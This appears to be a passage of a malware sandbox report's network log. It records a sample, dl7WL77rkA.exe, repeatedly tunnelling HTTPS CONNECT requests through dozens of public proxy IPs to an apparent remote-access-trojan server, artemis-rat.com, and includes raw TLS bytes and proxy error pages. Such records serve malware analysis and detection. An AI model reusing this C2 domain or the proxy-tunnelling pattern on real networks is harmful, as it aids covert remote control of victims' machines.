                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1214192.168.2.55326152.172.1.186803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.722640038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.143032074 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.143610954 CET337OUTData Raw: 16 03 03 01 4c 01 00 01 48 03 03 65 ee 6c d2 e5 74 12 d1 79 48 ea 2e df ff 34 35 76 f5 65 c9 da 3c 88 85 a0 4c 29 a9 8b 00 aa 89 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: LHeltyH.45ve<L)*,+0/$#('=<5/artemis-rat.com#Sj-6'#QA~UXs7D1*5#WKd*Z%59
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.641726017 CET1200INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 7d 19 f3 fd 7e 1a 5f 44 62 20 c1 5a 41 9b 6f 20 74 60 bd 4e 8e c7 1e 25 74 ad 6c 2d 25 14 7b 30 00 c0 2f 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 06 eb 0b 00 06 e7 00 06 e4 00 03 49 30
                                                                                                                                                                                                                                                            Data Ascii: =9}~_Db ZAo t`N%tl-%{0/I0E0-VEs?0*H0910UIN10UCISCO10USTBU10UCN0240214225240Z240514225239Z010Uartemis-rat.com0"0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.641834021 CET956INData Raw: c7 83 e0 38 e0 78 04 a2 16 fd 14 33 24 68 bd 49 a6 e0 0f 4e 5e 0a 9b 8a 8a 9e 6f f5 c2 a6 42 1d 4d a3 e5 ee 13 09 53 54 ef 77 c3 f6 78 45 cf 3e b9 10 c8 78 c9 bf ff 86 e3 9b 22 b4 d0 3a 41 61 a6 37 ad 67 94 f4 40 f7 0a 74 c6 1c e9 36 4b 06 c1 b7
                                                                                                                                                                                                                                                            Data Ascii: 8x3$hIN^oBMSTwxE>x":Aa7g@t6K_/nfGms.rBnAEv!}H?g^N)R+#B1fk=JL{7.q[_UKRk/9i)#jIX$s"\00UD;&HZ
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.664259911 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 19 c0 55 3a 68 8f e4 6d e5 6d 86 f8 c0 a7 7e b7 e7 c6 50 c6 17 85 e4 0b 37 01 06 15 54 e7 40 41 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 0a 1c 62 b7 db 39 bb a8 ed fe 3c 06 7e 4c ed 3c b6 a9 9f 38 0f
                                                                                                                                                                                                                                                            Data Ascii: %! U:hmm~P7T@A(b9<~L<8W,7-
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.063960075 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 03 09 fd ca 31 9f 03 82 b4 e9 48 f6 23 c2 b1 cb cd e5 6e 86 14 40 1a d4 fd f7 a9 b7 8e 09 ca dc b3 76 ee 8e 67 fb 20 ee
                                                                                                                                                                                                                                                            Data Ascii: (1H#n@vg


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1215192.168.2.551246203.76.103.5741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.724184990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1216192.168.2.553268211.222.252.18781933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.726624966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1217192.168.2.552682173.212.209.49395223876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.729626894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.889645100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.890993118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.889538050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1218192.168.2.55331313.229.47.109803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.730498075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.055418968 CET223INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:28:11 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 12
                                                                                                                                                                                                                                                            X-Kong-Response-Latency: 0.00011444091796875
                                                                                                                                                                                                                                                            Server: kong/2.8.1
                                                                                                                                                                                                                                                            Data Raw: 42 61 64 20 72 65 71 75 65 73 74 0a
                                                                                                                                                                                                                                                            Data Ascii: Bad request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1219192.168.2.55332343.131.245.216156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.733491898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1220192.168.2.55151151.38.63.124109833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.734282970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.796385050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.902416945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.905234098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1221192.168.2.5533221.15.62.1256783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.734307051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1222192.168.2.553242102.132.50.680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.743150949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1223192.168.2.55148345.11.95.16660043876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.743849039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1224192.168.2.55333060.205.132.71803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.745220900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.064095020 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.064251900 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1225192.168.2.553311103.76.148.9281813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.751832962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.607589006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.811343908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.083539009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.481995106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.108920097 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1226192.168.2.551571103.141.109.14780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.756243944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.435087919 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1227192.168.2.55328445.117.179.179187013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.756655931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1228192.168.2.55334883.243.92.15480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.790815115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1229192.168.2.553339103.216.49.15180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.790815115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1230192.168.2.553294103.83.36.156783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.798341036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1231192.168.2.55335545.233.2.141533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
